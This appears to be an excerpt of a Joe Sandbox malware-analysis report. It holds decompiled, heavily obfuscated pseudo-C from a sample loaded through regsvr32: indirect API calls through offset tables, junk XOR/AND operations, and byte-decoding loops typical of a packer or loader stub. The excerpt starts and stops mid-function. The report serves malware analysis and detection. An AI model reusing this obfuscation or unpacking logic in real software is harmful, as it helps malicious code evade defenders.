                            				void* _t640;
                            				void* _t641;
                            				signed int _t657;
                            				signed int _t660;
                            				signed int* _t672;
                            				signed int* _t673;
                            				signed int* _t676;
                            				intOrPtr* _t677;
                            				signed int* _t678;
                            
                            				_t625 = __esi;
                            				_t584 = __edi;
                            				_t567 = __edx;
                            				_t504 = __ecx;
                            				_t493 = __ebx;
                            				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
                            					_push(__ebx + 0x4354be);
                            					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
                            					_push(_v20);
                            					_pop( *_t6);
                            				}
                            				_t416 = _t493 + 0x435323;
                            				if( *(_t493 + 0x4351eb) == 0) {
                            					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
                            					 *_t672 = _t657;
                            					 *(_t493 + 0x4351eb) = 0 ^ _t489;
                            					_t657 = 0;
                            					_t416 =  *_t672;
                            					_t672 = _t672 - 0xfffffffc;
                            				}
                            				_push(_t416);
                            				_t417 = _t493 + 0x43569a;
                            				if( *(_t493 + 0x4354fd) == 0) {
                            					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
                            					_v12 = _t584;
                            					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
                            					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
                            					_t584 = _v12;
                            					_t417 =  *_t672;
                            					_t672 = _t672 - 0xfffffffc;
                            				}
                            				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
                            				_push(_v16);
                            				_pop( *_t25);
                            				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
                            					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
                            					_push(_v12);
                            					_pop( *_t31);
                            				}
                            				_push(_t625);
                            				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
                            					_t481 = _t493 + 0x4353d6;
                            					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
                            						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
                            						_push(_v20);
                            						_pop( *_t39);
                            						_t481 =  *_t672;
                            						_t672 = _t672 - 0xfffffffc;
                            					}
                            					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
                            					_push(_v12);
                            					_pop( *_t43);
                            				}
                            				_push(_t584);
                            				if( *(_t493 + 0x4356f5) == 0) {
                            					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
                            					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
                            					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
                            					_t504 = _t504;
                            				}
                            				_push(_a4);
                            				_pop( *_t53);
                            				_push(_v12);
                            				_pop(_t626);
                            				if( *(_t493 + 0x4358dc) == 0) {
                            					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
                            					_v16 = _t584;
                            					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
                            					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
                            					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
                            					if( *(_t493 + 0x435268) == 0) {
                            						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
                            						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
                            						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
                            						_t567 = _t567;
                            						_t477 =  *_t672;
                            						_t672 =  &(_t672[1]);
                            					}
                            					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
                            					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
                            					_t626 = _t626;
                            				}
                            				_v12 = _t504;
                            				_t585 = 0 ^ _a8;
                            				_t507 = _v12;
                            				if( *(_t493 + 0x435675) == 0) {
                            					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
                            					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
                            					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
                            					_t507 = _t507;
                            				}
                            				if( *(_t493 + 0x435732) == 0) {
                            					if( *(_t493 + 0x435142) == 0) {
                            						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
                            						_v16 = _t626;
                            						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
                            						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
                            						_t626 = _v16;
                            					}
                            					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
                            					_v20 = _t507;
                            					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
                            					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
                            					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
                            						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
                            						_push(_v12);
                            						_pop( *_t115);
                            					}
                            				}
                            				_push( *((intOrPtr*)(_t626 + 8)));
                            				if( *(_t493 + 0x435898) == 0) {
                            					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
                            					_v12 = _t585;
                            					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
                            					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
                            					_t585 = _v12;
                            				}
                            				_push(_t585);
                            				if( *(_t493 + 0x4358d8) == 0) {
                            					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
                            					 *_t672 = _t567;
                            					 *(_t493 + 0x4358d8) = 0 ^ _t466;
                            					_t567 = 0;
                            				}
                            				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
                            					if( *(_t493 + 0x4355f9) == 0) {
                            						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
                            						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
                            						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
                            						_t585 = _t585;
                            					}
                            					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
                            					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
                            						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
                            						_push(_v16);
                            						_pop( *_t145);
                            						_t462 =  *_t672;
                            						_t672 = _t672 - 0xfffffffc;
                            					}
                            					 *_t146 = _t462;
                            					_push(_v16);
                            					_pop( *_t148);
                            				}
                            				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
                            				_push(_v12);
                            				_t509 =  &_v20;
                            				_t660 = _t657;
                            				_push(_t509);
                            				if( *(_t493 + 0x4359bd) == 0) {
                            					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
                            					_v20 = _t509;
                            					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
                            					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
                            					_t509 = (_v20 & 0x00000000) +  *_t672;
                            					_t672 = _t672 - 0xfffffffc;
                            				}
                            				_t627 = _t626 +  *_t626;
                            				if( *(_t493 + 0x4357f2) == 0) {
                            					_push(_t509);
                            					if( *(_t493 + 0x4355bd) == 0) {
                            						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
                            						_v16 = _t627;
                            						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
                            						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
                            						_t627 = _v16;
                            					}
                            					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
                            					_push(0xc);
                            					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
                            						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
                            						 *_t672 = _t627;
                            						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
                            						_t627 = 0;
                            					}
                            					_push( *((intOrPtr*)(_t493 + 0x435346)));
                            					if( *(_t493 + 0x435815) == 0) {
                            						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
                            						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
                            						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
                            						_t627 = _t627;
                            					}
                            					_push(0x2e);
                            					_push( *((intOrPtr*)(_t493 + 0x435a19)));
                            					if( *(_t493 + 0x435a09) == 0) {
                            						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
                            						_v12 = _t509;
                            						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
                            						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
                            						_t509 = _v12;
                            					}
                            					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
                            					if( *(_t493 + 0x4359dd) == 0) {
                            						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
                            						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
                            						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
                            						_t509 = _t509;
                            						_pop( *_t207);
                            						_t451 = _v12;
                            					}
                            					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
                            					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
                            					_t660 = _t660;
                            					_t509 =  *_t672;
                            					_t672 = _t672 - 0xfffffffc;
                            				}
                            				do {
                            					asm("movsb");
                            					_t509 = _t509 - 1;
                            				} while (_t509 != 0);
                            				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
                            				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
                            				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
                            				_t512 = _t509;
                            				if( *(_t493 + 0x4355d5) == 0) {
                            					_push(_t493 + 0x435736);
                            					if( *(_t493 + 0x4352bf) == 0) {
                            						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
                            						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
                            						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
                            						_t585 = _t585;
                            					}
                            					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
                            					_push(_t585);
                            					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
                            					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
                            					if( *(_t493 + 0x435264) == 0) {
                            						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
                            						_v12 = _t567;
                            						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
                            						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
                            						_t567 = _v12;
                            					}
                            				}
                            				_pop( *_t243);
                            				_t514 = _t512 & 0x00000000 ^ _v20;
                            				if( *(_t493 + 0x4359ed) == 0) {
                            					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
                            					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
                            					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
                            					_t660 = _t660;
                            					_t514 =  *_t672;
                            					_t672 =  &(_t672[1]);
                            				}
                            				_t587 =  *_t672;
                            				_t673 =  &(_t672[1]);
                            				if( *(_t493 + 0x4351b7) == 0) {
                            					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
                            					_v16 = _t514;
                            					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
                            					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
                            					_pop( *_t261);
                            					_t514 = _v16;
                            				}
                            				_v12 = _t421;
                            				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
                            				_push(_t493);
                            				do {
                            					_t425 =  *_t629 & 0x000000ff;
                            					_t629 = _t629 + 1;
                            					if(_t425 == 0) {
                            						goto L64;
                            					}
                            					_push(_t514);
                            					 *_t673 = 1;
                            					_t515 = _t629;
                            					 *_t266 = _t629;
                            					_push(_v20);
                            					_pop(_t567);
                            					_v8 = 8;
                            					do {
                            						asm("rol eax, cl");
                            						_t495 = _t425;
                            						_t425 = _t567;
                            						asm("ror ebx, cl");
                            						_t269 =  &_v8;
                            						 *_t269 = _v8 - 1;
                            					} while ( *_t269 != 0);
                            					 *_t673 = _t515;
                            					_t425 = _t495;
                            					 *_t271 = 0;
                            					_t514 = 0 ^ _v12;
                            					L64:
                            					asm("stosb");
                            					_t514 = _t514 - 1;
                            				} while (_t514 != 0);
                            				_pop( *_t273);
                            				_t497 = 0 ^ _v12;
                            				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
                            					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
                            					 *_t279 = _t425;
                            					_push(_v12);
                            					_pop( *_t281);
                            				}
                            				if( *(_t497 + 0x435122) == 0) {
                            					_t283 = _t497 + 0x435182; // 0x435182
                            					if( *(_t497 + 0x4357e2) == 0) {
                            						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
                            						_v12 = _t587;
                            						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
                            						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
                            						_t587 = _v12;
                            					}
                            					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
                            					_v20 = _t567;
                            					 *(_t497 + 0x435122) = _t425;
                            					_t567 = _v20;
                            					if( *(_t497 + 0x4354ca) == 0) {
                            						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
                            						 *_t673 = _t660;
                            						 *(_t497 + 0x4354ca) = _t425;
                            						_t660 = 0;
                            					}
                            				}
                            				if(_a4 != 0) {
                            					if( *(_t497 + 0x435250) == 0) {
                            						_t303 = _t497 + 0x4358c0; // 0x4358c0
                            						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
                            						 *_t673 = _t629;
                            						 *(_t497 + 0x435250) = 0 ^ _t425;
                            						_t629 = 0;
                            					}
                            					if(_a8 != 0) {
                            						if( *(_t497 + 0x435213) == 0) {
                            							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
                            							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
                            							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
                            							_t587 = _t587;
                            						}
                            						_t425 = E00781C5D(_t497, _t514, _t567, _t629, _a8, _a4);
                            					}
                            				}
                            				_pop( *_t315);
                            				_t568 = _v20;
                            				if( *(_t497 + 0x4352f3) == 0) {
                            					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
                            					_push(_t514);
                            					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
                            					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
                            					_t568 =  *_t673;
                            					_t673 = _t673 - 0xfffffffc;
                            				}
                            				if(_t568 > 0) {
                            					if( *(_t497 + 0x4354b6) == 0) {
                            						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
                            						_v12 = _t587;
                            						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
                            						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
                            					}
                            					_push(_a4);
                            					_pop( *_t339);
                            					_push(_v16);
                            					_pop(_t590);
                            					_push(_t590);
                            					 *_t673 = _t629;
                            					_t520 =  *(_t590 + 4);
                            					_t634 = 0;
                            					if( *(_t497 + 0x4350bc) == 0) {
                            						_t343 = _t497 + 0x4355b5; // 0x4355b5
                            						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
                            						_push(0);
                            						 *_t673 = _t660;
                            						 *(_t497 + 0x4350bc) = 0 ^ _t425;
                            						_t520 =  *_t673;
                            						_t673 =  &(_t673[1]);
                            					}
                            					_v16 = _t497;
                            					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
                            					_t500 = _v16;
                            					if( *(_t500 + 0x435659) == 0) {
                            						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
                            						_v12 = _t590;
                            						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
                            						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
                            						_t590 = _v12;
                            						 *_t357 = _t520;
                            						_t520 = _t520 & 0x00000000 ^ _v12;
                            						 *_t359 = _t427;
                            						_t427 = _v16;
                            					}
                            					_push(_t520);
                            					_push(_t520);
                            					_v16 = _t634;
                            					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
                            					_t637 = _v16;
                            					if( *(_t500 + 0x4353fa) == 0) {
                            						_t365 = _t500 + 0x43595c; // 0x43595c
                            						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
                            						_v16 = _t590;
                            						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
                            						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
                            						_t590 = _v16;
                            						_t570 = (_t570 & 0x00000000) +  *_t673;
                            						_t673 = _t673 - 0xfffffffc;
                            					}
                            					_v16 = _t520;
                            					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
                            					_push( *_t673);
                            					 *_t673 =  *_t673 - _t570;
                            					_pop(_t525);
                            					if( *(_t500 + 0x435984) == 0) {
                            						_t379 = _t500 + 0x435829; // 0x435829
                            						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
                            						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
                            						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
                            						_t590 = _t590;
                            						_t570 =  *_t673;
                            						_t673 = _t673 - 0xfffffffc;
                            						 *_t385 = _t379;
                            						_t525 = _t525 & 0x00000000 | _v12;
                            					}
                            					_t640 = _t639 + _t525;
                            					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
                            					_t503 = _t500;
                            					if( *(_t503 + 0x43579a) == 0) {
                            						_t389 = _t503 + 0x4359c1; // 0x4359c1
                            						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
                            						_v16 = _t527;
                            						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
                            						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
                            						 *_t397 = _t389;
                            						_t570 = _t570 & 0x00000000 | _v12;
                            						 *_t399 = _t570;
                            						_t527 = _v20;
                            					}
                            					memcpy(_t590, _t640, _t527);
                            					_t676 =  &(_t673[3]);
                            					_t592 = _t640 + _t527 + _t527;
                            					_push(_a8);
                            					_pop( *_t402);
                            					_push(_v20);
                            					_pop(_t641);
                            					if( *(_t503 + 0x4352b7) == 0) {
                            						_t405 = _t503 + 0x435237; // 0x435237
                            						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
                            						_v20 = _t641;
                            						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
                            						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
                            						_t641 = _v20;
                            						_t570 =  *_t676;
                            						_t676 = _t676 - 0xfffffffc;
                            					}
                            					_t677 = _t676 - 0xfffffffc;
                            					_push(0 ^  *_t676);
                            					 *_t677 =  *_t677 - _t570;
                            					_pop(_t531);
                            					_t429 = memcpy(_t592, _t641, _t531);
                            					_t678 = _t677 + 0xc;
                            					 *_t414 = _t429;
                            					_t629 =  *_t678;
                            					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
                            					_t673 =  &(_t678[4]);
                            					_t587 = _t629 + (0 | _v12) + (0 | _v12);
                            				}
                            				return _t425;
                            			}
                            0x00783f2d
                            0x00783f35
                            0x00783f3c
                            0x00783f42
                            0x00783f45
                            0x00783f48
                            0x00783f4b
                            0x00783f4e
                            0x00783f4f
                            0x00783f52
                            0x00783f5a
                            0x00783f5c
                            0x00783f64
                            0x00783f67
                            0x00783f6e
                            0x00783f74
                            0x00783f76
                            0x00783f7d
                            0x00783f86
                            0x00783f89
                            0x00783f89
                            0x00783f8c
                            0x00783f98
                            0x00783f9a
                            0x00783fa4
                            0x00783fa8
                            0x00783fae
                            0x00783fb6
                            0x00783fbd
                            0x00783fc3
                            0x00783fcc
                            0x00783fcf
                            0x00783fd2
                            0x00783fd5
                            0x00783fd5
                            0x00783fd8
                            0x00783fd9
                            0x00783fda
                            0x00783fe5
                            0x00783fe7
                            0x00783ff1
                            0x00783ff4
                            0x00783ffb
                            0x00784001
                            0x00784009
                            0x00784010
                            0x00784016
                            0x0078401f
                            0x00784022
                            0x00784022
                            0x00784025
                            0x00784031
                            0x00784039
                            0x0078403a
                            0x0078403d
                            0x00784045
                            0x00784049
                            0x00784050
                            0x0078405c
                            0x00784063
                            0x00784069
                            0x0078406c
                            0x0078406f
                            0x00784078
                            0x0078407b
                            0x0078407b
                            0x0078407e
                            0x0078408a
                            0x0078408c
                            0x00784094
                            0x00784098
                            0x0078409f
                            0x007840a5
                            0x007840ad
                            0x007840b4
                            0x007840c3
                            0x007840c6
                            0x007840cb
                            0x007840ce
                            0x007840ce
                            0x007840d1
                            0x007840d1
                            0x007840d1
                            0x007840d3
                            0x007840d6
                            0x007840d9
                            0x007840dc
                            0x007840e4
                            0x007840e7
                            0x007840ee
                            0x007840f4
                            0x007840fc
                            0x00784103
                            0x00784109
                            0x0078410e
                            0x00784111
                            0x00784111
                            0x00784119
                            0x0078411c
                            0x0078411d
                            0x00784120
                            0x00784121
                            0x00784121
                            0x00784136
                            0x0078413e
                            0x00784144
                            0x00784144
                            0x00784144
                            0x00784144
                            0x0078415f

                            APIs
                            • OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 00783811
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            • Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                            • Instruction ID: 00269cb71a8345197c2fa7e638e8a6226c920d1e7aa6f2051e3d0451c7034a23
                            • Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                            • Instruction Fuzzy Hash: D8624D72900604EFFF049FA4C889B9A7BB5FF24321F0851A9ED1D9E099D77815A4CF68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E0078242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _t337;
                            				signed int _t339;
                            				void* _t346;
                            				void* _t347;
                            				signed int _t348;
                            				signed int _t350;
                            				signed int _t351;
                            				signed int _t357;
                            				signed int _t358;
                            				signed int _t361;
                            				void* _t364;
                            				void* _t365;
                            				signed int _t366;
                            				signed int _t368;
                            				signed int _t371;
                            				signed int _t374;
                            				signed int _t377;
                            				signed int _t379;
                            				signed int _t380;
                            				signed int _t382;
                            				signed int _t384;
                            				signed int _t388;
                            				signed int _t391;
                            				signed int _t392;
                            				signed int _t394;
                            				signed int _t397;
                            				signed int _t398;
                            				signed int _t400;
                            				signed int _t404;
                            				signed int _t405;
                            				signed int _t408;
                            				signed int _t409;
                            				signed int _t413;
                            				signed int _t415;
                            				signed int _t417;
                            				signed int _t420;
                            				signed int _t423;
                            				signed int _t428;
                            				signed int _t431;
                            				signed int _t433;
                            				signed int _t454;
                            				signed int _t457;
                            				signed int _t479;
                            				signed int _t481;
                            				signed int _t484;
                            				void* _t486;
                            				signed int _t489;
                            				void* _t492;
                            				signed int _t500;
                            				signed int _t503;
                            				void* _t516;
                            				signed int _t523;
                            				signed int _t526;
                            				signed int _t529;
                            				void* _t531;
                            				signed int _t562;
                            				void* _t565;
                            				void* _t568;
                            				signed int* _t571;
                            				signed int* _t572;
                            				signed int* _t574;
                            				signed int* _t575;
                            
                            				_t523 = __esi;
                            				_t479 = __edi;
                            				_t450 = __edx;
                            				_t426 = __ecx;
                            				_t417 = __ebx;
                            				if( *(__ebx + 0x4351c7) == 0) {
                            					_push(__ecx);
                            					_push(__edx);
                            					_push(__ebx + 0x4351ef);
                            					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
                            					_v12 = __edx;
                            					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
                            					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
                            					_pop( *_t11);
                            					_t450 = _v12 & 0x00000000 ^ _v12;
                            					_pop( *_t13);
                            					_t426 = __ecx & 0x00000000 | _v12;
                            				}
                            				if( *(_t417 + 0x4352b0) == 0) {
                            					_push(_t426);
                            					_push(_t450);
                            					if( *(_t417 + 0x4355c5) == 0) {
                            						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
                            						_v12 = _t523;
                            						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
                            						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
                            						_t523 = _v12;
                            					}
                            					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
                            					if( *(_t417 + 0x43523f) == 0) {
                            						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
                            						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
                            						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
                            						_t479 = _t479;
                            						_t337 =  *_t571;
                            						_t571 =  &(_t571[1]);
                            					}
                            					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
                            					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
                            					_t523 = _t523;
                            					if( *(_t417 + 0x4351b3) == 0) {
                            						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
                            						_push(_t426);
                            						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
                            						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
                            					}
                            					_pop( *_t46);
                            					_t450 = _v12;
                            					_t426 =  *_t571;
                            					_t571 =  &(_t571[1]);
                            					if( *(_t417 + 0x4353c2) == 0) {
                            						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
                            						_v12 = _t479;
